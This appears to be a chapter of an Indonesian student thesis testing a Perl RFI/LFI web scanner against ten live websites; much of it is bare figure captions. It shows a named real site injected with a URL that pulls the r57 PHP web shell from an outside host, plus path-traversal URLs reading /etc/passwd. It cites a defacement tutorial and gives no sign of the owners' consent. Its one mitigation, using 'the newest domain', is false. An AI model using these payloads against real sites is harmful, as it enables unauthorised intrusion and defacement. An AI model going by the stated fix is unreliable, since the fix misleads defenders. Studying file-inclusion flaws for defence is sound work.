Pengujian dilakukan dengan sistem hardware sebagai berikut:
1. Komputer dengan spesifikasi AMD Dual Core 2,2 GHz, RAM 2GB, 2. Harddisk 250GB, VGA ATI Radeon
3. Sistem Operasi Ubuntu 10.04
4. CPU yang telah terinstall Perl yang berguna untuk menjalankan aplikasi ini yang dibuat menggunakan bahasa pemrograman Perl.
5. Komputer/laptop yang terkoneksi Internet
5.2 Uji Coba
5.2.1 Aplikasi Web Vulnerability Scanner
Gambar 5.1 Halaman Utama
Pada Gambar 5.1 diatas terdapat Menu Utama, pada Menu tersebut terdapat 3 buah Menu pilihan sebagai berikut :
• Menu RFI_Scanner didalam panel WVS digunakan untuk melakukan proses scanning pada suatu web terhadap kelemahan RFI.
• Menu LFI_Scanner didalam panel WVS digunakan untuk melakukan proses scanning pada suatu web terhadap kelemahan LFI.
• Menu Exit : menu ini berfungsi untuk ingin keluar dari penggunaan aplikasi
5.2.2 Pr oses RFI_Scanner
Proses ini dilakukan dengan memasukkan target RFI kedalam inputan, syarat aplikasi harus terhubung dengan target yang akan discan untuk melakukan pencarian kesalahan terhadap website target:
Gambar 5.2 Tampilan RFI_Scanner
Tahap berikutnya ini adalah dimana aplikasi melakukan proses pencarian kesalahan dengan cara menekan tombol enter.
Gambar 5.3 Proses RFI_Scanner
Pada Gambar 5.3 diatas merupakan proses dimana aplikasi mencari kelemahan RFI yang ada di dalam url website target. Setelah proses Rfi_Scanner selesai akan muncul Report seperti berikut :
Gambar 5. 4 Report Rfi_Scanner telah menemukan vulnerable
Dan hasil akhir proses scanning yang telah dilakukan oleh aplikasi ini adalah :
Gambar 5.6 Tampilan website target yang sudah terinjeksi
5.2.3 Pr oses LFI_Scanner
Proses ini dilakukan dengan memasukkan target LFI kedalam inputan, syarat aplikasi harus terhubung dengan target yang akan discan untuk melakukan pencarian kesalahan terhadap website target:
Tahap berikutnya ini adalah dimana aplikasi melakukan proses pencarian kesalahan dengan cara menekan tombol enter.
Pada Gambar 5.7 diatas merupakan proses dimana aplikasi mencari kelemahan LFI yang ada di dalam url website target. Setelah proses Lfi_Scanner selesai akan muncul Report seperti berikut :
Gambar 5.8 Report LFI_Scanner telah menemukan vulnerable Contoh Uji coba pada 10 website:
- Uji coba pada website1, ini adalah tampilan sebelum dilakukan proses pencarian kelemahan RFI dan LFI.
Gambar 5.9 Tampilan awal web target1 Kemudian lakukan proses scanning pada website target1
Scanning dan report pada RFI
Gambar 5.10 Tampilan rfi scanning web target1
Scanning dan report pada LFI
Gambar 5.12 Tampilan lfi scanning web target1
Gambar 5.13 Tampilan report lfi web target1
Setelah melakukan scanning jika terdapat kelemahan RFI dan LFI akan di tampilkan proses hasil scanning.
Gambar 5.14 Tampilan web target1 yang terinjeksi rfi
Gambar 5.15 Tampilan web target1 yang terinjeksi lfi
- Uji coba pada website2, ini adalah tampilan sebelum dilakukan proses pencarian kelemahan RFI dan LFI.
Gambar 5.16 Tampilan awal web target2
Kemudian lakukan proses scanning pada website target2 Scanning dan report pada RFI
Gambar 5.18 Tampilan report rfi web target2
Scanning dan report pada LFI
Gambar 5.20 Tampilan report lfi web target2
Setelah melakukan scanning jika terdapat kelemahan RFI dan LFI akan di tampilkan proses hasil scanning.
Gambar 5.22 Tampilan web target2 yang terinjeksi lfi
- Uji coba pada website3, ini adalah tampilan sebelum dilakukan proses pencarian kelemahan RFI dan LFI.
Gambar 5.23 Tampilan awal web target3
Scanning dan report pada RFI
Gambar 5.24 Tampilan rfi scanning web target3
Gambar 5.25 Tampilan report rfi web target3
Gambar 5.26 Tampilan lfi scanning web target3
Gambar 5.27 Tampilan report lfi web target3
Setelah melakukan scanning jika terdapat kelemahan RFI dan LFI akan di tampilkan proses hasil scanning.
Gambar 5.28 Tampilan web target3 yang terinjeksi rfi
Gambar 5.29 Tampilan web target3 yang terinjeksi lfi
- Uji coba pada website4, ini adalah tampilan sebelum dilakukan proses pencarian kelemahan RFI dan LFI.
Gambar 5.30 Tampilan awal web target4
Kemudian lakukan proses scanning pada website target4 Scanning dan report pada RFI
Gambar 5.32 Tampilan report rfi web target4
Scanning dan report pada LFI
Gambar 5.34 Tampilan report lfi web target4
Setelah melakukan scanning jika terdapat kelemahan RFI dan LFI akan di tampilkan proses hasil scanning.
Gambar 5.36 Tampilan web target4 yang terinjeksi lfi
- Website yang tidak dapat terinjeksi :
Gambar 5.38 Tampilan awal web target6
Gambar 5.40 Tampilan awal web target8
Gambar 5.42 Tampilan awal web target10
- Dari uji coba 10 website diatas terdapat 4 website yang vulnerable terhadap injeksi rfi dan lfi dan 6 website yang not vulnerable terhadap injeksi rfi dan lfi.
5.3ANALISIS
Ini adalah tahap analisa proses pencarian kelemahan file-file yang ada di dalam url website tersebut.
5.3.1 Analisis RFI_Scanner
Dari hasil ujicoba RFI diatas dapat diambil kesimpulan sebagai berikut : Proses scanning pada url http://www.kadin-sda.com didapat satu link dimana link tersebut terdapatnya vulnerable.
http://www.kadin-
sda.com/index.php?page=page=http://www.sh3ll.org/r57.txt?
link diatas adalah hasil dari penginjeksian shell script terhadap web target tersebut dan dari link vulnerability tersebut terdapat kelemahan terhadap serangan RFI.
5.3.2 Analisis LFI_Scanner
Dari hasil ujicoba LFI diatas dapat diambil kesimpulan sebagai berikut : Setelah melakukan proses scanning pada RFI selanjutnya dapat melakukan proses scanning pada LFI karena proses ini membutuhkan hasil link
vulnerability pada RFI. Sehingga terdapat beberapa link yang vulnerable yaitu : http://www.target.com/index.php?page=../../etc/passwd http:// www.target.com /index.php?page=../../../etc/passwd http:// www.target.com /index.php?page=../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../../etc/passwd
link diatas adalah hasil dari penginjeksian shell script terhadap web target tersebut dan dari link vulnerability tersebut terdapat kelemahan terhadap serangan LFI.
6.1 Kesimpulan a. RFI_Scanner
Dari hasil ujicoba Scan RFI pada Situs http://www.target.com didapatkan 1 URL. yaitu :
http:// www.target.com/index.php?page=page=http://www.sh3ll.org/r57.txt?
Link tersebut adalah letak vulnerable injeksi RFI
b. LFI_Scanner
Dari hasil ujicoba Scan LFI pada Situs http://www.target.com didapatkan beberapa URL. yaitu :
http://www.target.com/index.php?page=../../etc/passwd http:// www.target.com /index.php?page=../../../etc/passwd http:// www.target.com /index.php?page=../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../../../etc/passwd http:// www.target.com /index.php?page=../../../../../../../../etc/passwd
Link diatas adalah letak vulnerable injeksi LFI Penjelasan :
− RFI Scan harus dijalankan terlebih dahulu supaya mendapatkan target URL yang vulnerable kemudian LFI Scan dijalakan dengan
mengambil hasil Scan dari RFI.
− Waktu Scanner tergantung pada koneksi dan banyak nya ukuran file yang di injeksikan.
− Implementasi RFI lebih kompleks dari pada LFI karena harus
menginjeksikan dimana site mengizinkan attacker meng-include-kan file dari luar server. Sedangkan LFI di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
− Kelemahan ini dapat dihindari dengan menggunakan domain yang terbaru.
6.2 Sar an
Kedepannya aplikasi ini dapat di integrasikan dengan aplikasi yang berbasis GUI agar dapat difungsikan secara mudah.
Apache. _ . Apache HTTP Server Version 2.2 Documentation (http://httpd.apache.org/docs/2.2/).
Berners-Lee, T., Fielding, R. and H. Frystyk. 1996.Hypertext Transfer Protocol -- HTTP/1.0. RFC 1945.
Mansfield, Niall. 2002. Practical TCP/IP Jilid 1. Yogyakarta: Penerbit Andi. Mansfield, Niall. 2002. Practical TCP/IP Jilid 2. Yogyakarta: Penerbit Andi. Peramban Web, http://sapoelidie.webatu.com/Cara_mendeface_dengan_RFI.php
diakses tanggal 1 Mei 2012 jam 14.30
CERN, Masinter, L., dkk. 1994. Uniform Resource Locators (URL).RFC 1738. Peramban Web, http://lib.uin-malang.ac.id/?mod=th_detail&id=06550023 diakses pada tanggal 1 Mei 2012 jam 9.00